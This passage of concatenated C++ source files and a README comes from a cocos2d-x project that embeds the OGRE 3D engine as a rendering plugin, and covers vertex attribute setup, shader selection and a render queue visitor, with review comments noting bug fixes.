glBindTexture(GL_TEXTURE_2D, cctextureId);
}
// Sort out normalisation
// Assume first world matrix representative - shaders that use multiple
// matrices should control renormalisation themselves
if ((pass->getNormaliseNormals() || mNormaliseNormalsOnScale)
&& mTempXform[0].hasScale())
mDestRenderSystem->setNormaliseNormals(true);
else
mDestRenderSystem->setNormaliseNormals(false);
// Sort out negative scaling
// Assume first world matrix representative
if (mFlipCullingOnNegativeScale)
{
CullingMode cullMode = mPassCullingMode;
if (mTempXform[0].hasNegativeScale())
{
switch (mPassCullingMode)
{
case CULL_CLOCKWISE:
cullMode = CULL_ANTICLOCKWISE;
break;
case CULL_ANTICLOCKWISE:
cullMode = CULL_CLOCKWISE;
break;
case CULL_NONE:
break;
};
}
// this also copes with returning from negative scale in previous render op
// for same pass
if (cullMode != mDestRenderSystem->_getCullingMode())
mDestRenderSystem->_setCullingMode(cullMode);
}
// Set up the solid / wireframe override
// Precedence is Camera, Object, Material
// Camera might not override object if not overrideable
PolygonMode reqMode = pass->getPolygonMode();
if (pass->getPolygonModeOverrideable() && rend->getPolygonModeOverrideable())
{
PolygonMode camPolyMode = mCameraInProgress->getPolygonMode();
// check camera detial only when render detail is overridable
if (reqMode > camPolyMode)
{
// only downgrade detail; if cam says wireframe we don't go up to solid
reqMode = camPolyMode;
}
}
mDestRenderSystem->_setPolygonMode(reqMode);
// optional light scissoring
ClipResult scissored = CLIPPED_NONE;
ClipResult clipped = CLIPPED_NONE;
if (rend->preRender(this, mDestRenderSystem))
{
//mDestRenderSystem->_render(ro);
void* pBufferData = 0;
const VertexDeclaration::VertexElementList& decl =
ro.vertexData->vertexDeclaration->getElements();
VertexDeclaration::VertexElementList::const_iterator elem, elemEnd;
elemEnd = decl.end();
for (elem = decl.begin(); elem != elemEnd; ++elem)
{
if (!ro.vertexData->vertexBufferBinding->isBufferBound(elem->getSource()))
continue; // skip unbound elements
CHECK_GL_ERROR_DEBUG();;
HardwareVertexBufferSharedPtr vertexBuffer =
ro.vertexData->vertexBufferBinding->getBuffer(elem->getSource());
GLuint bufferId = static_cast<const BridgeHardwareVertexBuffer*>(vertexBuffer.get())->getGLBufferId();
glBindBuffer(GL_ARRAY_BUFFER, bufferId);
//_bindGLBuffer(GL_ARRAY_BUFFER,bufferId);
pBufferData = ((char *)NULL + (elem->getOffset())) ;
if (ro.vertexData->vertexStart)
{
pBufferData = static_cast<char*>(pBufferData)+ro.vertexData->vertexStart * vertexBuffer->getVertexSize();
}
VertexElementSemantic sem = elem->getSemantic();
unsigned short typeCount = VertexElement::getTypeCount(elem->getType());
GLboolean normalised = GL_FALSE;
bool multitexturing = false;//(getCapabilities()->getNumTextureUnits() > 1);
bool isCustomAttrib = false;
GLuint attrib = 0;
switch (elem->getType())
{
case VET_COLOUR:
case VET_COLOUR_ABGR:
case VET_COLOUR_ARGB:
// Because GL takes these as a sequence of single unsigned bytes, count needs to be 4
// VertexElement::getTypeCount treats them as 1 (RGBA)
// Also need to normalise the fixed-point data
typeCount = 4;
normalised = GL_TRUE;
break;
default:
break;
};
std::string key;
if (!isCustomAttrib)
{
// fixed-function & builtin attribute support
switch (sem)
{
case VES_POSITION:
attrib = 0;
key = GLProgram::ATTRIBUTE_NAME_POSITION;
break;
//case VES_NORMAL:
// break;
case VES_DIFFUSE:
attrib = 1;
key = GLProgram::ATTRIBUTE_NAME_COLOR;
break;
//case VES_SPECULAR:
// break;
case VES_TEXTURE_COORDINATES:
attrib = 2;
key = GLProgram::ATTRIBUTE_NAME_TEX_COORD;
break;
default:
attrib = 12;
break;
};
}
int type = GLES2HardwareBufferManager::getGLType(elem->getType());
GLsizei size = static_cast<GLsizei>(vertexBuffer->getVertexSize());
programstate->setVertexAttribPointer(key,
typeCount,
type,
normalised,
size,
(GLvoid*)pBufferData
);
}
// Find the correct type to render
GLint primType;
switch (ro.operationType)
{
case RenderOperation::OT_POINT_LIST:
primType = GL_POINTS;
break;
case RenderOperation::OT_LINE_LIST:
primType = GL_LINES;
break;
case RenderOperation::OT_LINE_STRIP:
primType = GL_LINE_STRIP;
break;
default:
case RenderOperation::OT_TRIANGLE_LIST:
primType = GL_TRIANGLES;
break;
case RenderOperation::OT_TRIANGLE_STRIP:
primType = GL_TRIANGLE_STRIP;
break;
case RenderOperation::OT_TRIANGLE_FAN:
primType = GL_TRIANGLE_FAN;
break;
}
if (ro.useIndexes)
{
GLuint bufferId = static_cast<GLES2HardwareIndexBuffer*>(ro.indexData->indexBuffer.get())->getGLBufferId();
//glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, bufferId);
pBufferData =((char *)NULL + (ro.indexData->indexStart *
ro.indexData->indexBuffer->getIndexSize())) ;
GLenum indexType = (ro.indexData->indexBuffer->getType() == HardwareIndexBuffer::IT_16BIT) ? GL_UNSIGNED_SHORT : GL_UNSIGNED_INT;
CHECK_GL_ERROR_DEBUG();;
GLenum primitive = primType ;
//glDrawElements(primitive, ro.indexData->indexCount, indexType, pBufferData);
CHECK_GL_ERROR_DEBUG();;
programstate->applyGLProgram(*((cocos2d::Mat4*)mTempXform));
programstate->applyUniforms();
programstate->applyAttributes();
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, bufferId);
glDrawElements(primitive, ro.indexData->indexCount, indexType,pBufferData);
CHECK_GL_ERROR_DEBUG();
glBindBuffer(GL_ARRAY_BUFFER, 0);
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, 0);
CC_INCREMENT_GL_DRAWN_BATCHES_AND_VERTICES(1, 6);
CHECK_GL_ERROR_DEBUG();
// Update derived depth bias
}
}
rend->postRender(this, mDestRenderSystem);
}
// !skipBecauseOfLightType
}
}
}*/
<file_sep>#ifndef OGRE_BRIDGE_RENDERSYSTEM_Plugin_H
#define OGRE_BRIDGE_RENDERSYSTEM_Plugin_H
#include "OgrePlugin.h"
namespace Ogre
{
class BridgeRenderSystem;
}
namespace Ogre
{
/** Ogre Plugin wrapper exposing the cocos2d-x BridgeRenderSystem to Ogre's
 *  plugin manager. Follows the standard Ogre::Plugin life-cycle
 *  (install -> initialise -> shutdown -> uninstall); the member function
 *  bodies are defined elsewhere and are not visible here.
 */
class BridgeRenderSystemPlugin : public Plugin
{
public:
BridgeRenderSystemPlugin();
/// Name reported to the Ogre plugin manager.
const String& getName() const;
void install();
void uninstall();
void initialise();
void shutdown();
private:
// Render system instance managed by this plugin
// (presumably created in install() and destroyed in uninstall() -- confirm).
BridgeRenderSystem *mRenderSystem;
};
}
#endif //OGRE_BRIDGE_RENDERSYSTEM_Plugin_H<file_sep>
cocos2d-x-ogre
=========
| |iOS|Mac|Linux|Win32|Android|Win8.1-Universal|
| ----|----|----- | ---|----|------|---|
[cocos2d-x-ogre] 基于cocos2dx[1]的早期版本,以插件的形式引入ogre的核心库,使用cocos的纹理以及渲染,支持Particle Universe粒子系统,对于ogre项目移植有借鉴作用。由于项目支持原因,没有继续完善,现开放代码仅供参考。
cocos2d-x-ogre 目录:
OGRE的支持库:
cocos2dx-ogre\cocos2d\third_party
OGRE的控件使用封装:
cocos2dx-ogre\cocos2d\encapsulation\ogre
工程本身为标准cocos工程,编译过程和cocos项目一致
[1]: http://www.cocos2d-x.org "cocos2d-x"
[2]: http://www.cocos2d-iphone.org "cocos2d for iPhone"
[3]: http://www.cocos2d-x.org/projects/cocos2d-x/wiki/Download
[4]: http://www.cocos2d-x.org/download/version#Cocos2d-x
[5]: http://www.box2d.org "Box2D"
[6]: http://www.chipmunk-physics.net "Chipmunk2D"
[7]: http://esotericsoftware.com/ "http://esotericsoftware.com/"
[8]: https://github.com/cocos2d/cocos2d-x/blob/v3/docs/CONTRIBUTE.md
[9]: http://forum.cocos2d-x.org "http://forum.cocos2d-x.org"
[10]: http://www.twitter.com/cocos2dx "http://www.twitter.com/cocos2dx"
[11]: http://t.sina.com.cn/cocos2dx "http://t.sina.com.cn/cocos2dx"
[12]: https://webchat.freenode.net/ "https://webchat.freenode.net/"
<file_sep>/****************************************************************************
Copyright (c) 2014 Chukong Technologies Inc.
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#include "ScheduleAction.h"
#include "base/CCDirector.h"
#include "2d/CCCamera.h"
#include "renderer/CCRenderer.h"
#include "renderer/CCGLProgramCache.h"
#include "extension/ScriptCallFuncHelper.h"
NS_CC_BEGIN
//
// DelayTime
//
/** Factory following the usual cocos2d-x create() pattern.
 *  @param d      action duration in seconds
 *  @param helper script callback invoked every update tick (retained by init)
 *  @returns an autoreleased ScheduleAction, or nullptr on failure
 *
 *  BUG FIX: the previous version dereferenced the result of
 *  new(std::nothrow) without a null check and ignored the init result,
 *  so an allocation or init failure crashed or leaked the object.
 */
ScheduleAction* ScheduleAction::create(float d,ScriptCallFuncHelper *helper)
{
    ScheduleAction* action = new (std::nothrow) ScheduleAction();
    if (action && action->initWithAction(d, helper))
    {
        action->autorelease();
        return action;
    }
    CC_SAFE_DELETE(action);
    return nullptr;
}
/** Initialises the action with a duration and a retained script helper.
 *  @returns true when the base ActionInterval init succeeds.
 */
bool ScheduleAction::initWithAction(float d,ScriptCallFuncHelper *helper)
{
    CCASSERT(helper != nullptr, "");
    CCASSERT(helper != mScriptHelper, "");
    if (!ActionInterval::initWithDuration(d))
        return false;
    // Release any helper held by a previous init so a reused action
    // does not leak it.
    CC_SAFE_RELEASE(mScriptHelper);
    mScriptHelper = helper;
    mScriptHelper->retain();
    return true;
}
/** Creates an autoreleased copy with the same duration and script helper.
 *  (No copy constructor is defined, so init is invoked manually.)
 *
 *  BUG FIX: like create(), the old code dereferenced a std::nothrow
 *  allocation unchecked and ignored the init result; it now returns
 *  nullptr on failure instead of crashing or leaking.
 */
ScheduleAction* ScheduleAction::clone() const
{
    auto a = new (std::nothrow) ScheduleAction();
    if (a && a->initWithAction(_duration, mScriptHelper))
    {
        a->autorelease();
        return a;
    }
    CC_SAFE_DELETE(a);
    return nullptr;
}
/** Per-frame hook: forwards the normalised elapsed time to the script helper.
 *  @param time interpolation value supplied by the action system
 */
void ScheduleAction::update(float time)
{
    if (mScriptHelper == nullptr)
        return;
    mScriptHelper->excuteScript(Value(time));
}
// NOTE(review): the "reverse" is simply a fresh copy with the same duration
// and script helper -- the callback itself is not inverted; confirm this is
// the intended semantics for this action.
ScheduleAction* ScheduleAction::reverse() const
{
return ScheduleAction::create(_duration,mScriptHelper);
}
// Starts with no script helper; one is attached (and retained) in initWithAction().
ScheduleAction::ScheduleAction()
:mScriptHelper(nullptr)
{}
// Balances the retain() taken in initWithAction().
ScheduleAction::~ScheduleAction()
{
CC_SAFE_RELEASE_NULL(mScriptHelper);
}
NS_CC_END<file_sep>/*
-----------------------------------------------------------------------------
This source file is part of OGRE
(Object-oriented Graphics Rendering Engine)
For the latest info, see http://www.ogre3d.org/
Copyright (c) 2000-2012 Tor<NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
-----------------------------------------------------------------------------
*/
#include "OgreCommonGLContext.h"
namespace Ogre {
// GL context that forwards make-current / end-current requests to an external
// CommonGLContextDelegate, identified by an opaque integer handle. The
// delegate starts null and must be injected via setDelegate().
CommonGLContext::CommonGLContext(const CommonGLSupport *glsupport, int handle)
:mGLSupport(glsupport), mHandle(handle), mDelegate(0)
{
}
CommonGLContext::~CommonGLContext()
{
}
// Makes this context current via the delegate; a no-op while no delegate is set.
void CommonGLContext::setCurrent()
{
if(mDelegate)
mDelegate->setCurrent(mHandle);
}
// Releases currency via the delegate; a no-op while no delegate is set.
void CommonGLContext::endCurrent()
{
if(mDelegate)
mDelegate->endCurrent(mHandle);
}
// NOTE(review): the clone shares the support object and handle but starts
// with a null delegate (mDelegate is not copied) -- confirm this is intended.
GLES2Context* CommonGLContext::clone() const
{
return new CommonGLContext(mGLSupport, mHandle);
}
// Installs the object that performs the actual platform context switches.
void CommonGLContext::setDelegate(CommonGLContextDelegate *delegate)
{
mDelegate = delegate;
}
CommonGLContextDelegate *CommonGLContext::getDelegate()
{
return mDelegate;
}
// Opaque handle passed back to the delegate on every switch.
int CommonGLContext::getHandle() const
{
return mHandle;
}
}
<file_sep>/****************************************************************************
Copyright (c) 2014 Chukong Technologies Inc.
http://www.cocos2d-x.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
****************************************************************************/
#include "OgreOgreSprite3D.h"
#include <Ogre.h>
#include "OgreOgreManager.h"
#include "OgreNodeProtocol.h"
#include <OgreTechnique.h>
#include <OgreMovableObject.h>
#include <OgreMaterialManager.h>
#include <OgreEntity.h>
#include "components\OgreBridgeBufferManager.h"
#include "components\OgreBridgeTextureManager.h"
#include "OgreOgreManager.h"
#include "OgreSceneNode.h"
USING_NS_CC;
// Cache keys under which the bridge's two shader programs are registered in
// cocos2d's GLProgramCache; the programs are lazily created on first lookup.
static const char* SHADER_OGRE_POSITION_TEXTURE = "SHADER_OGRE_POSITION_TEXTURE";
static const char* SHADER_OGRE_POSITION_TEXTURE_COLOR = "SHADER_OGRE_POSITION_TEXTURE_COLOR";
namespace Ogre
{
/** Transpose-copies an Ogre::Matrix4 into a cocos2d::Mat4.
 *  Effectively dst.m[col * 4 + row] = src[row][col] for every cell,
 *  converting between the two libraries' element orderings.
 */
static void covertInverse(cocos2d::Mat4 &dst,Ogre::Matrix4 &src)
{
    for (int row = 0; row < 4; ++row)
    {
        for (int col = 0; col < 4; ++col)
        {
            dst.m[col * 4 + row] = src[row][col];
        }
    }
}
/** Returns a GLProgramState for one of the bridge's named shader programs,
 *  creating and caching the underlying GLProgram on first use.
 *  @param name one of SHADER_OGRE_POSITION_TEXTURE[_COLOR]
 *  @returns the shared GLProgramState, or nullptr for an unknown name
 *
 *  BUG FIX: previously an unrecognised name left glProgram null and the null
 *  pointer was handed straight to getOrCreateWithGLProgram (likely crash).
 *  The function now returns nullptr in that case.
 */
static cocos2d::GLProgramState *getOrCreateWithGLProgramName(const std::string &name)
{
    cocos2d::GLProgram *glProgram = cocos2d::GLProgramCache::getInstance()->getProgram(name);
    if (!glProgram)
    {
        if (name == SHADER_OGRE_POSITION_TEXTURE )
        {
            glProgram = GLProgram::createWithFilenames("shader/ccShader_PositionTex.vert","shader/ccShader_PositionTex.frag");
            cocos2d::GLProgramCache::getInstance()->addGLProgram(glProgram,SHADER_OGRE_POSITION_TEXTURE);
        }
        else if(name == SHADER_OGRE_POSITION_TEXTURE_COLOR )
        {
            glProgram = GLProgram::createWithFilenames("shader/ccShader_PositionTexColor.vert","shader/ccShader_PositionTexColor.frag");
            cocos2d::GLProgramCache::getInstance()->addGLProgram(glProgram,SHADER_OGRE_POSITION_TEXTURE_COLOR);
        }
    }
    if (!glProgram)
    {
        // Unknown shader name (or shader files failed to load): bail out
        // rather than dereference a null program.
        return nullptr;
    }
    return cocos2d::GLProgramState::getOrCreateWithGLProgram(glProgram);
}
// Bit flags describing which vertex attributes a mesh supplies, plus the
// composite combinations used by getOrCreateWithVertexFlag to select a
// matching shader program.
enum {
OGRE_VERTEX_ATTRIB_FLAG_NONE = 0,
OGRE_VERTEX_ATTRIB_FLAG_POSITION = 1 << 0,
OGRE_VERTEX_ATTRIB_FLAG_COLOR = 1 << 1,
OGRE_VERTEX_ATTRIB_FLAG_TEX_COORD = 1 << 2,
OGRE_VERTEX_ATTRIB_FLAG_NORMAL = 1 << 3,
OGRE_VERTEX_ATTRIB_FLAG_BLEND_WEIGHT = 1 << 4,
OGRE_VERTEX_ATTRIB_FLAG_BLEND_INDEX = 1 << 5,
OGRE_UNIFORM_FLAG_COLOR = 1 << 6,
// Composite program-selection masks.
OGRE_PROGRAM_FLAG_POS_TEX = (OGRE_VERTEX_ATTRIB_FLAG_POSITION | OGRE_VERTEX_ATTRIB_FLAG_TEX_COORD),
OGRE_PROGRAM_FLAG_POS_TEX_NORMAL = (OGRE_VERTEX_ATTRIB_FLAG_POSITION | OGRE_VERTEX_ATTRIB_FLAG_TEX_COORD | OGRE_VERTEX_ATTRIB_FLAG_NORMAL),
OGRE_PROGRAM_FLAG_POS_COLOR_TEX = (OGRE_VERTEX_ATTRIB_FLAG_POSITION | OGRE_VERTEX_ATTRIB_FLAG_COLOR | OGRE_VERTEX_ATTRIB_FLAG_TEX_COORD),
OGRE_PROGRAM_FLAG_POS_COLOR_TEX_NORMAL = (OGRE_VERTEX_ATTRIB_FLAG_POSITION | OGRE_VERTEX_ATTRIB_FLAG_COLOR | OGRE_VERTEX_ATTRIB_FLAG_TEX_COORD | OGRE_VERTEX_ATTRIB_FLAG_NORMAL),
};
/** Picks a shader program state from a vertex-attribute flag combination.
 *  Meshes without a per-vertex colour channel get the plain
 *  position+texture program; everything else (including unknown
 *  combinations) falls back to the position+texture+colour program.
 */
static cocos2d::GLProgramState * getOrCreateWithVertexFlag(const int &flag)
{
    const bool texOnly = (flag == OGRE_PROGRAM_FLAG_POS_TEX) ||
                         (flag == OGRE_PROGRAM_FLAG_POS_TEX_NORMAL);
    return getOrCreateWithGLProgramName(texOnly ? SHADER_OGRE_POSITION_TEXTURE
                                                : SHADER_OGRE_POSITION_TEXTURE_COLOR);
}
/** Maps an Ogre vertex-element semantic to the bridge's attribute bit flag.
 *  @returns a reference to the matching flag, or OGRE_VERTEX_ATTRIB_FLAG_NONE
 *           for unhandled semantics.
 *
 *  BUG FIX: the previous version returned a const reference bound to an
 *  enumerator, which materializes a temporary int destroyed at function
 *  exit -- every caller received a dangling reference (undefined behaviour).
 *  The values below have static storage duration so the returned references
 *  stay valid; the signature is unchanged for existing callers.
 */
const int & getVertexAttribFlagBySemantic(VertexElementSemantic semantic)
{
    static const int kNone        = OGRE_VERTEX_ATTRIB_FLAG_NONE;
    static const int kPosition    = OGRE_VERTEX_ATTRIB_FLAG_POSITION;
    static const int kColor       = OGRE_VERTEX_ATTRIB_FLAG_COLOR;
    static const int kTexCoord    = OGRE_VERTEX_ATTRIB_FLAG_TEX_COORD;
    static const int kNormal      = OGRE_VERTEX_ATTRIB_FLAG_NORMAL;
    static const int kBlendWeight = OGRE_VERTEX_ATTRIB_FLAG_BLEND_WEIGHT;
    static const int kBlendIndex  = OGRE_VERTEX_ATTRIB_FLAG_BLEND_INDEX;
    switch(semantic)
    {
    case VES_POSITION:
        return kPosition;
    case VES_DIFFUSE:
        return kColor;
    case VES_TEXTURE_COORDINATES:
        return kTexCoord;
    case VES_NORMAL:
        return kNormal;
    case VES_BLEND_WEIGHTS:
        return kBlendWeight;
    case VES_BLEND_INDICES:
        return kBlendIndex;
    default:
        return kNone;
    }
}
/** Maps an Ogre vertex-element semantic to the cocos2d shader attribute name.
 *  @returns the matching GLProgram attribute name, or "" for semantics with
 *           no mapping.
 *
 *  BUG FIX: 'attribute_name' was previously left uninitialized and the switch
 *  had no default, so unmapped semantics (e.g. VES_SPECULAR, VES_BINORMAL,
 *  VES_TANGENT) returned an indeterminate pointer (undefined behaviour).
 *  Unmapped semantics now yield an empty name, which simply matches no
 *  shader attribute.
 */
const char* getVertexAttribNameBySemantic(VertexElementSemantic semantic)
{
    const char* attribute_name = "";
    switch(semantic)
    {
    case VES_POSITION:
        attribute_name = GLProgram::ATTRIBUTE_NAME_POSITION;
        break;
    case VES_BLEND_WEIGHTS:
        attribute_name = GLProgram::ATTRIBUTE_NAME_BLEND_WEIGHT;
        break;
    case VES_BLEND_INDICES:
        attribute_name = GLProgram::ATTRIBUTE_NAME_BLEND_INDEX;
        break;
    case VES_NORMAL:
        attribute_name = GLProgram::ATTRIBUTE_NAME_NORMAL;
        break;
    case VES_DIFFUSE:
        attribute_name = GLProgram::ATTRIBUTE_NAME_COLOR;
        break;
    case VES_TEXTURE_COORDINATES:
        attribute_name = GLProgram::ATTRIBUTE_NAME_TEX_COORD;
        break;
    default:
        // VES_SPECULAR / VES_BINORMAL / VES_TANGENT and any future semantics.
        break;
    }
    return attribute_name;
}
/** Translates an Ogre vertex element type into the (size, type, normalized)
 *  triple expected by glVertexAttribPointer.
 *  Unknown element types leave all three output parameters untouched,
 *  exactly as before.
 */
void refreshVertexAttribTypeByType(VertexElementType elementType,GLint &size, GLenum &type,GLboolean &normalized)
{
    switch(elementType)
    {
    case VET_FLOAT1: type = GL_FLOAT; size = 1; normalized = GL_FALSE; break;
    case VET_FLOAT2: type = GL_FLOAT; size = 2; normalized = GL_FALSE; break;
    case VET_FLOAT3: type = GL_FLOAT; size = 3; normalized = GL_FALSE; break;
    case VET_FLOAT4: type = GL_FLOAT; size = 4; normalized = GL_FALSE; break;
    case VET_SHORT1: type = GL_SHORT; size = 1; normalized = GL_FALSE; break;
    case VET_SHORT2: type = GL_SHORT; size = 2; normalized = GL_FALSE; break;
    case VET_SHORT3: type = GL_SHORT; size = 3; normalized = GL_FALSE; break;
    case VET_SHORT4: type = GL_SHORT; size = 4; normalized = GL_FALSE; break;
    // Packed colour formats and UBYTE4 are four unsigned bytes, normalized.
    case VET_COLOUR:
    case VET_COLOUR_ABGR:
    case VET_COLOUR_ARGB:
    case VET_UBYTE4:
        type = GL_UNSIGNED_BYTE; size = 4; normalized = GL_TRUE;
        break;
    default:
        break;
    }
}
class QueueVisitor : public RenderQueue
{
public:
virtual ~QueueVisitor(){};
// Default-constructed; scene manager and render system are injected via setters.
QueueVisitor(){}
/// Injects the scene manager forwarded to Renderable::preRender/postRender.
void setSceneManager(Ogre::SceneManager *manager)
{
mSceneManager = manager;
}
/// Injects the render system forwarded to Renderable::preRender/postRender.
void setRenderSystem(Ogre::RenderSystem *system)
{
mRenderSystem = system;
}
// Depth-first traversal of a scene-node subtree: each visible attached
// movable object is notified of the current camera and asked to submit its
// renderables into this queue (which renders them immediately through
// addRenderable), then every child node is visited recursively.
void _visitor(Ogre::SceneNode *node)
{
SceneNode::ObjectIterator objs = node->getAttachedObjectIterator();
while (objs.hasMoreElements())
{
MovableObject* mobj = objs.getNext();
if(mobj && mobj->getVisible())
{
mobj->_notifyCurrentCamera( OgreManager::getInstance()->getCamera());
mobj->_updateRenderQueue(this);
}
}
SceneNode::ChildNodeIterator children = node->getChildIterator();
while (children.hasMoreElements())
{
this->_visitor(static_cast<SceneNode*>(children.getNext()));
}
}
// Entry point: refreshes the subtree's transforms, then walks it while
// '_tempStateMap' points at the caller's per-renderable state cache used by
// _render(). The cache pointer is cleared again before returning.
void visitor(Ogre::SceneNode *protocol,MeshStateMap *stateMap)
{
_tempStateMap = stateMap;
protocol->_update(true,true);
_visitor(protocol);
_tempStateMap = NULL;
}
/** RenderQueue override: instead of queuing the renderable for later, it
 *  resolves the technique (falling back to BaseWhite, letting the optional
 *  listener veto or override), classifies transparency, then immediately
 *  renders every pass of the chosen technique via _render().
 *  @param pRend    renderable being submitted
 *  @param groupID  render-queue group (only forwarded to the listener)
 *  @param priority render priority (only forwarded to the listener)
 */
virtual void addRenderable(Renderable* pRend, uint8 groupID, ushort priority)
{
Technique* pTech;
// tell material it's been used
if (!pRend->getMaterial().isNull())
pRend->getMaterial()->touch();
// Check material & technique supplied (the former since the default implementation
// of getTechnique is based on it for backwards compatibility
if(pRend->getMaterial().isNull() || !pRend->getTechnique())
{
// Use default base white
MaterialPtr baseWhite = MaterialManager::getSingleton().getByName("BaseWhite");
pTech = baseWhite->getTechnique(0);
}
else
pTech = pRend->getTechnique();
if (mRenderableListener)
{
// Allow listener to override technique and to abort
if (!mRenderableListener->renderableQueued(pRend, groupID, priority,
&pTech, this))
return; // rejected
// tell material it's been used (incase changed)
pTech->getParent()->touch();
}
// A technique counts as transparent when sorting is forced, or when it
// blends without fully writing/checking depth or colour -- and transparent
// sorting is enabled on it.
bool isTransparent = false;
if (pTech->isTransparentSortingForced() ||
(pTech->isTransparent() &&
(!pTech->isDepthWriteEnabled() ||
!pTech->isDepthCheckEnabled() ||
pTech->hasColourWriteDisabled())))
{
if (pTech->isTransparentSortingEnabled())
isTransparent = true;
}
// Render every pass right away, bracketed by pre/postRender hooks.
Technique::PassIterator pi = pTech->getPassIterator();
while (pi.hasMoreElements())
{
const Pass * pass = pi.getNext();
if (pRend->preRender(mSceneManager,mRenderSystem))
{
_render(pRend, pass, isTransparent);
}
pRend->postRender(mSceneManager,mRenderSystem);
}
}
/** Captures everything needed to draw one renderable/pass pair into the
 *  per-renderable RenderState cache ('_tempStateMap'): GL buffer ids, blend
 *  factors, world transform, texture id and index-draw parameters.
 *  On the first encounter of a renderable the vertex buffer layout is
 *  formatted (_formatVertexBuffer); afterwards only the attribute pointers
 *  are refreshed.
 */
void _render(Renderable *rend,const Pass *pass,bool isTransport)
{
MeshStateMap::iterator stateItor = _tempStateMap->find(rend);
RenderState *renderState;
// NOTE(review): 'hardwareBuffer' is only assigned inside the two helpers and
// stays uninitialized if no vertex element is bound -- confirm that cannot
// happen for the meshes fed through here.
HardwareBuffer *hardwareBuffer;
rend->getRenderOperation(mOperation);
if(stateItor != _tempStateMap->end())
{
renderState = &stateItor->second;
_refreshVertexAttribPointer(mOperation,&renderState->glProgramState,&hardwareBuffer);
}
else
{
(*_tempStateMap)[rend] = RenderState();
stateItor = _tempStateMap->find(rend);
renderState = &stateItor->second;
_formatVertexBuffer(mOperation,&renderState->glProgramState,&hardwareBuffer);
}
renderState->vertexBufferId = static_cast<const BridgeHardwareVertexBuffer*>(hardwareBuffer)->getGLBufferId();
renderState->blend.src = pass->getSourceBlendFactor();
renderState->blend.dst = pass->getDestBlendFactor();
int matCount = rend->getNumWorldTransforms();
if(matCount > 0)
{
rend->getWorldTransforms(mMatrix4);
// NOTE(review): the loop overwrites renderState->mat4 on every iteration,
// so only the LAST world matrix survives -- verify multi-matrix (skinned)
// renderables are not expected here.
for(int i= 0 ;i < matCount; i++)
{
covertInverse(renderState->mat4,mMatrix4[i]);
}
}
// Reissue any texture gen settings which are dependent on view matrix
Pass::ConstTextureUnitStateIterator texIter = pass->getTextureUnitStateIterator();
size_t unit = 0;
while (texIter.hasMoreElements())
{
TextureUnitState* pTex = texIter.getNext();
pTex->_prepare();
//if (pTex->hasViewRelativeTextureCoordinateGeneration())
//{
// mDestRenderSystem->_setTextureUnitSettings(unit, *pTex);
//}
//++unit;
// Only a single textureId slot exists, so the last non-null texture unit wins.
BridgeTexturePtr textP = BridgeTexturePtr(pTex->_getTexturePtr());
if(!textP.isNull())
{
renderState->textureId = textP->getGLID();
}
}
// Draw parameters are captured only for indexed geometry; non-indexed
// operations leave the state invisible.
if (mOperation.useIndexes)
{
renderState->_visible = true;
renderState->indexBufferId = static_cast<BridgeHardwareIndexBuffer*>(mOperation.indexData->indexBuffer.get())->getGLBufferId();
renderState->indexBufferType = mOperation.indexData->indexBuffer->getType();
renderState->operationType = mOperation.operationType;
renderState->indexCount = mOperation.indexData->indexCount;
renderState->isTransparent = isTransport;
renderState->isDepthTestEnabled = pass->getDepthCheckEnabled();
renderState->isDepthWriteEnabled = pass->getDepthWriteEnabled();
}
}
// Walks the vertex declaration and points the GL program state's attributes
// into the single bound hardware vertex buffer.  Reports (but tolerates) a
// renderable that binds more than one vertex buffer.
